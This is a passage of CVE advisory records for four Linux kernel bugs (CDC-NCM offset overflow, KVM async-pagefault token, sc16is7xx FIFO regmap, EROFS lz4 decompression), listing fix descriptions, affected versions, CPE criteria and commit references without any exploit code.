"version": "4.14.317",
"versionType": "semver"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/cdc_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.323",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.323",
"versionStartIncluding": "4.19.285",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"versionStartIncluding": "5.4.245",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.317",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nCDC-NCM: avoid overflow in sanity checking\n\nA broken device may give an extreme offset like 0xFFF0\nand a reasonable length for a fragment. In the sanity\ncheck as formulated now, this will create an integer\noverflow, defeating the sanity check. Both offset\nand offset + len need to be checked in such a manner\nthat no overflow can occur.\nAnd those quantities should be unsigned."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-23T15:21:07.103Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a612395c7631918e0e10ea48b9ce5ab4340f26a6"
},
{
"url": "https://git.kernel.org/stable/c/9957fbf34f52a4d8945d1bf39aae400ef9a11246"
},
{
"url": "https://git.kernel.org/stable/c/69560efa001397ebb8dc1c3e6a3ce00302bb9f7f"
},
{
"url": "https://git.kernel.org/stable/c/49909c9f8458cacb5b241106cba65aba5a6d8f4c"
},
{
"url": "https://git.kernel.org/stable/c/7b737e47b87589031f0d4657f6d7b0b770474925"
},
{
"url": "https://git.kernel.org/stable/c/8d2b1a1ec9f559d30b724877da4ce592edc41fdc"
}
],
"title": "CDC-NCM: avoid overflow in sanity checking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48938",
"datePublished": "2024-08-22T03:31:33.381Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2026-05-23T15:21:07.103Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-48943 (GCVE-0-2022-48943)
Vulnerability from cvelistv5 – Published: 2024-08-22 03:30 – Updated: 2026-05-11 18:50
VLAI
EPSS
Title
KVM: x86/mmu: make apf token non-zero to fix bug
Summary
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: make apf token non-zero to fix bug
In current async pagefault logic, when a page is ready, KVM relies on
kvm_arch_can_dequeue_async_page_present() to determine whether to deliver
a READY event to the Guest. This function test token value of struct
kvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a
READY event is finished by Guest. If value is zero meaning that a READY
event is done, so the KVM can deliver another.
But the kvm_arch_setup_async_pf() may produce a valid token with zero
value, which is confused with previous mention and may lead the loss of
this READY event.
This bug may cause task blocked forever in Guest:
INFO: task stress:7532 blocked for more than 1254 seconds.
Not tainted 5.10.0 #16
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:stress state:D stack: 0 pid: 7532 ppid: 1409
flags:0x00000080
Call Trace:
__schedule+0x1e7/0x650
schedule+0x46/0xb0
kvm_async_pf_task_wait_schedule+0xad/0xe0
? exit_to_user_mode_prepare+0x60/0x70
__kvm_handle_async_pf+0x4f/0xb0
? asm_exc_page_fault+0x8/0x30
exc_page_fault+0x6f/0x110
? asm_exc_page_fault+0x8/0x30
asm_exc_page_fault+0x1e/0x30
RIP: 0033:0x402d00
RSP: 002b:00007ffd31912500 EFLAGS: 00010206
RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0
RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0
RBP: 00000000021262b0 R08: 0000000000000003 R09: 0000000000000086
R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000
R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 72fdfc75d4217b32363cc80def3de2cb3fef3f02
(git)
Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 4c3644b6c96c5daa5149e5abddc07234eea47c7c (git) Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 62040f5cd7d937de547836e747b6aa8212fec573 (git) Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 6f3c1fc53d86d580d8d6d749c4af23705e4f6f79 (git) |
|
| Linux | Linux |
Affected:
5.8
Unaffected: 0 , < 5.8 (semver) Unaffected: 5.10.103 , ≤ 5.10.* (semver) Unaffected: 5.15.26 , ≤ 5.15.* (semver) Unaffected: 5.16.12 , ≤ 5.16.* (semver) Unaffected: 5.17 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48943",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:08.943998Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:10.679Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/mmu/mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "72fdfc75d4217b32363cc80def3de2cb3fef3f02",
"status": "affected",
"version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
"versionType": "git"
},
{
"lessThan": "4c3644b6c96c5daa5149e5abddc07234eea47c7c",
"status": "affected",
"version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
"versionType": "git"
},
{
"lessThan": "62040f5cd7d937de547836e747b6aa8212fec573",
"status": "affected",
"version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
"versionType": "git"
},
{
"lessThan": "6f3c1fc53d86d580d8d6d749c4af23705e4f6f79",
"status": "affected",
"version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kvm/mmu/mmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/mmu: make apf token non-zero to fix bug\n\nIn current async pagefault logic, when a page is ready, KVM relies on\nkvm_arch_can_dequeue_async_page_present() to determine whether to deliver\na READY event to the Guest. This function test token value of struct\nkvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a\nREADY event is finished by Guest. If value is zero meaning that a READY\nevent is done, so the KVM can deliver another.\nBut the kvm_arch_setup_async_pf() may produce a valid token with zero\nvalue, which is confused with previous mention and may lead the loss of\nthis READY event.\n\nThis bug may cause task blocked forever in Guest:\n INFO: task stress:7532 blocked for more than 1254 seconds.\n Not tainted 5.10.0 #16\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:stress state:D stack: 0 pid: 7532 ppid: 1409\n flags:0x00000080\n Call Trace:\n __schedule+0x1e7/0x650\n schedule+0x46/0xb0\n kvm_async_pf_task_wait_schedule+0xad/0xe0\n ? exit_to_user_mode_prepare+0x60/0x70\n __kvm_handle_async_pf+0x4f/0xb0\n ? asm_exc_page_fault+0x8/0x30\n exc_page_fault+0x6f/0x110\n ? asm_exc_page_fault+0x8/0x30\n asm_exc_page_fault+0x1e/0x30\n RIP: 0033:0x402d00\n RSP: 002b:00007ffd31912500 EFLAGS: 00010206\n RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0\n RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0\n RBP: 00000000021262b0 R08: 0000000000000003 R09: 0000000000000086\n R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000\n R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T18:50:09.238Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/72fdfc75d4217b32363cc80def3de2cb3fef3f02"
},
{
"url": "https://git.kernel.org/stable/c/4c3644b6c96c5daa5149e5abddc07234eea47c7c"
},
{
"url": "https://git.kernel.org/stable/c/62040f5cd7d937de547836e747b6aa8212fec573"
},
{
"url": "https://git.kernel.org/stable/c/6f3c1fc53d86d580d8d6d749c4af23705e4f6f79"
}
],
"title": "KVM: x86/mmu: make apf token non-zero to fix bug",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48943",
"datePublished": "2024-08-22T03:30:14.027Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2026-05-11T18:50:09.238Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52488 (GCVE-0-2023-52488)
Vulnerability from cvelistv5 – Published: 2024-02-29 15:52 – Updated: 2026-05-11 19:28
VLAI
EPSS
Title
serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
The SC16IS7XX IC supports a burst mode to access the FIFOs where the
initial register address is sent ($00), followed by all the FIFO data
without having to resend the register address each time. In this mode, the
IC doesn't increment the register address for each R/W byte.
The regmap_raw_read() and regmap_raw_write() are functions which can
perform IO over multiple registers. They are currently used to read/write
from/to the FIFO, and although they operate correctly in this burst mode on
the SPI bus, they would corrupt the regmap cache if it was not disabled
manually. The reason is that when the R/W size is more than 1 byte, these
functions assume that the register address is incremented and handle the
cache accordingly.
Convert FIFO R/W functions to use the regmap _noinc_ versions in order to
remove the manual cache control which was a workaround when using the
_raw_ versions. FIFO registers are properly declared as volatile so
cache will not be used/updated for FIFO accesses.
Severity
No CVSS data available.
Assigner
References
6 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
dfeae619d781dee61666d5551b93ba3be755a86b , < 4e37416e4ee1b1bc17364a68973e0c63be89e611
(git)
Affected: dfeae619d781dee61666d5551b93ba3be755a86b , < e635f652696ef6f1230621cfd89c350cb5ec6169 (git) Affected: dfeae619d781dee61666d5551b93ba3be755a86b , < 416b10d2817c94db86829fb92ad43ce7d002c573 (git) Affected: dfeae619d781dee61666d5551b93ba3be755a86b , < 084c24e788d9cf29c55564de368bf5284f2bb5db (git) Affected: dfeae619d781dee61666d5551b93ba3be755a86b , < aa7cb4787698add9367b19f7afc667662c9bdb23 (git) Affected: dfeae619d781dee61666d5551b93ba3be755a86b , < dbf4ab821804df071c8b566d9813083125e6d97b (git) |
|
| Linux | Linux |
Affected:
3.16
Unaffected: 0 , < 3.16 (semver) Unaffected: 5.10.215 , ≤ 5.10.* (semver) Unaffected: 5.15.154 , ≤ 5.15.* (semver) Unaffected: 6.1.76 , ≤ 6.1.* (semver) Unaffected: 6.6.15 , ≤ 6.6.* (semver) Unaffected: 6.7.3 , ≤ 6.7.* (semver) Unaffected: 6.8 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52488",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T15:51:12.991001Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:42.809Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.407Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e37416e4ee1b1bc17364a68973e0c63be89e611"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e635f652696ef6f1230621cfd89c350cb5ec6169"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/416b10d2817c94db86829fb92ad43ce7d002c573"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/084c24e788d9cf29c55564de368bf5284f2bb5db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa7cb4787698add9367b19f7afc667662c9bdb23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbf4ab821804df071c8b566d9813083125e6d97b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/sc16is7xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4e37416e4ee1b1bc17364a68973e0c63be89e611",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "e635f652696ef6f1230621cfd89c350cb5ec6169",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "416b10d2817c94db86829fb92ad43ce7d002c573",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "084c24e788d9cf29c55564de368bf5284f2bb5db",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "aa7cb4787698add9367b19f7afc667662c9bdb23",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
},
{
"lessThan": "dbf4ab821804df071c8b566d9813083125e6d97b",
"status": "affected",
"version": "dfeae619d781dee61666d5551b93ba3be755a86b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/sc16is7xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.16"
},
{
"lessThan": "3.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO\n\nThe SC16IS7XX IC supports a burst mode to access the FIFOs where the\ninitial register address is sent ($00), followed by all the FIFO data\nwithout having to resend the register address each time. In this mode, the\nIC doesn\u0027t increment the register address for each R/W byte.\n\nThe regmap_raw_read() and regmap_raw_write() are functions which can\nperform IO over multiple registers. They are currently used to read/write\nfrom/to the FIFO, and although they operate correctly in this burst mode on\nthe SPI bus, they would corrupt the regmap cache if it was not disabled\nmanually. The reason is that when the R/W size is more than 1 byte, these\nfunctions assume that the register address is incremented and handle the\ncache accordingly.\n\nConvert FIFO R/W functions to use the regmap _noinc_ versions in order to\nremove the manual cache control which was a workaround when using the\n_raw_ versions. FIFO registers are properly declared as volatile so\ncache will not be used/updated for FIFO accesses."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T19:28:18.109Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4e37416e4ee1b1bc17364a68973e0c63be89e611"
},
{
"url": "https://git.kernel.org/stable/c/e635f652696ef6f1230621cfd89c350cb5ec6169"
},
{
"url": "https://git.kernel.org/stable/c/416b10d2817c94db86829fb92ad43ce7d002c573"
},
{
"url": "https://git.kernel.org/stable/c/084c24e788d9cf29c55564de368bf5284f2bb5db"
},
{
"url": "https://git.kernel.org/stable/c/aa7cb4787698add9367b19f7afc667662c9bdb23"
},
{
"url": "https://git.kernel.org/stable/c/dbf4ab821804df071c8b566d9813083125e6d97b"
}
],
"title": "serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52488",
"datePublished": "2024-02-29T15:52:08.132Z",
"dateReserved": "2024-02-20T12:30:33.301Z",
"dateUpdated": "2026-05-11T19:28:18.109Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52497 (GCVE-0-2023-52497)
Vulnerability from cvelistv5 – Published: 2024-02-29 15:52 – Updated: 2026-05-11 19:28
VLAI
EPSS
Title
erofs: fix lz4 inplace decompression
Summary
In the Linux kernel, the following vulnerability has been resolved:
erofs: fix lz4 inplace decompression
Currently EROFS can map another compressed buffer for inplace
decompression, that was used to handle the cases that some pages of
compressed data are actually not in-place I/O.
However, like most simple LZ77 algorithms, LZ4 expects the compressed
data is arranged at the end of the decompressed buffer and it
explicitly uses memmove() to handle overlapping:
__________________________________________________________
|_ direction of decompression --> ____ |_ compressed data _|
Although EROFS arranges compressed data like this, it typically maps two
individual virtual buffers so the relative order is uncertain.
Previously, it was hardly observed since LZ4 only uses memmove() for
short overlapped literals and x86/arm64 memmove implementations seem to
completely cover it up and they don't have this issue. Juhyung reported
that EROFS data corruption can be found on a new Intel x86 processor.
After some analysis, it seems that recent x86 processors with the new
FSRM feature expose this issue with "rep movsb".
Let's strictly use the decompressed buffer for lz4 inplace
decompression for now. Later, as an useful improvement, we could try
to tie up these two buffers together in the correct order.
Severity
No CVSS data available.
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
0ffd71bcc3a03ebb3551661a36052488369c4de9 , < 9ff2d260b25df6fe1341a79113d88fecf6bd553e
(git)
Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < a0180e940cf1aefa7d516e20b259ad34f7a8b379 (git) Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < 77cbc04a1a8610e303a0e0d74f2676667876a184 (git) Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < 33bf23c9940dbd3a22aad7f0cda4c84ed5701847 (git) Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < f36d200a80a3ca025532ed60dd1ac21b620e14ae (git) Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < bffc4cc334c5bb31ded54bc3cfd651735a3cb79e (git) Affected: 0ffd71bcc3a03ebb3551661a36052488369c4de9 , < 3c12466b6b7bf1e56f9b32c366a3d83d87afb4de (git) |
|
| Linux | Linux |
Affected:
5.3
Unaffected: 0 , < 5.3 (semver) Unaffected: 5.4.285 , ≤ 5.4.* (semver) Unaffected: 5.10.211 , ≤ 5.10.* (semver) Unaffected: 5.15.150 , ≤ 5.15.* (semver) Unaffected: 6.1.76 , ≤ 6.1.* (semver) Unaffected: 6.6.15 , ≤ 6.6.* (semver) Unaffected: 6.7.3 , ≤ 6.7.* (semver) Unaffected: 6.8 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52497",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-07T16:13:41.821063Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:41.074Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.612Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0180e940cf1aefa7d516e20b259ad34f7a8b379"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77cbc04a1a8610e303a0e0d74f2676667876a184"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33bf23c9940dbd3a22aad7f0cda4c84ed5701847"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f36d200a80a3ca025532ed60dd1ac21b620e14ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bffc4cc334c5bb31ded54bc3cfd651735a3cb79e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c12466b6b7bf1e56f9b32c366a3d83d87afb4de"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/erofs/decompressor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9ff2d260b25df6fe1341a79113d88fecf6bd553e",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "a0180e940cf1aefa7d516e20b259ad34f7a8b379",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "77cbc04a1a8610e303a0e0d74f2676667876a184",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "33bf23c9940dbd3a22aad7f0cda4c84ed5701847",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "f36d200a80a3ca025532ed60dd1ac21b620e14ae",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "bffc4cc334c5bb31ded54bc3cfd651735a3cb79e",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "3c12466b6b7bf1e56f9b32c366a3d83d87afb4de",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/erofs/decompressor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
